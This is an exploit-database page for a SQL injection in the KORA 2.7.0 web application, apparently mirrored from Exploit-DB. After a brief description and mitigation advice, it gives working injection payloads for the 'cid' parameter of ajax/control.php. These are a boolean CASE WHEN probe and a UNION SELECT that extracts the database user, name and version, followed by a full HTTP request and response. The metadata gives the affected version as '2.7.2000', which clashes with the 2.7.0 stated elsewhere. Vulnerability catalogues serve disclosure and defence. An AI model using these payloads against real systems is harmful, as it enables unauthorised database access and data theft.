header-logo
Suggest Exploit
vendor:
KORA
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: KORA
Affected Version From: 2.7.2000
Affected Version To: 2.7.2000
Patch Exists: NO
Related CWE:
CPE: a:matrix.msu.edu:kora:2.7.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64, Kali Linux x64
2018

KORA 2.7.0 – SQL Injection

The KORA 2.7.0 web application is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'cid' parameter of the 'assocSearch' action in the 'control.php' file. This can lead to unauthorized access to the database and potential data leakage.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Regularly updating the software to the latest version also helps in reducing the risk of such vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: KORA 2.7.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.matrix.msu.edu/
# Software Link: https://sourceforge.net/projects/kora/files/latest/download
# Version: 2.7.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=[SQL]&keywords=1
# 
# (CASE WHEN (22=22) THEN 22 ELSE 1*(SELECT 22 FROM DUAL UNION SELECT 66 FROM DUAL) END)
# 
# 1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
# 
GET /[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=-1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-&keywords=1 HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 13 Oct 2018 02:01:22 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=pa377tajtaocbeauhd67llk8l4; path=/
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 536
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#

Navigation

Suggest Exploit

Services By CQR